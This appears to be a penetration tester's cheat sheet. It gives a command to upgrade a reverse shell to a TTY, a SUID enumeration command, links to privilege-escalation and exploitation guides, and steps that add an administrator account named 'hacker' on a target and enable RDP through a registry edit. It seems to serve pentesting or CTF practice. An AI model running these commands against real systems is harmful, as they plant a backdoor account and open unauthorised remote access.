*************************************************************************

Useful Commands

*************************************************************************

### Get a TTY shell after a reverse shell connection
	
python -c 'import pty;pty.spawn("/bin/bash")'

### PrivEsc - Enumerate all binaries having SUID permissions

find / -perm -u=s -type f 2>/dev/null

*************************************************************************

Useful Links

*************************************************************************

### Linux Privilege Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
https://gtfobins.github.io/#+sudo
https://guif.re/linuxeop
https://payatu.com/guide-linux-privilege-escalation

### Windows Privilege Escalation

https://www.fuzzysecurity.com/tutorials/16.html
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

### Tomcat Exploitation
https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/

### Cheat Sheet - Reverse Shell
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

*************************************************************************

Useful Guides

*************************************************************************

### Enable RDP on target with new new user as local admin

Let’s remote into this desktop. We will need to enable RDP and log in as a new user.

> net user hacker hacker /add
> net localgroup /add Administrators hacker

I just created a new user named hacker with its password as hacker. I have also added it to the local “administrators” group.

> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

To enable RDP we need to add this registry key. We can verify that RDP port 3389 is now enabled (nmap).
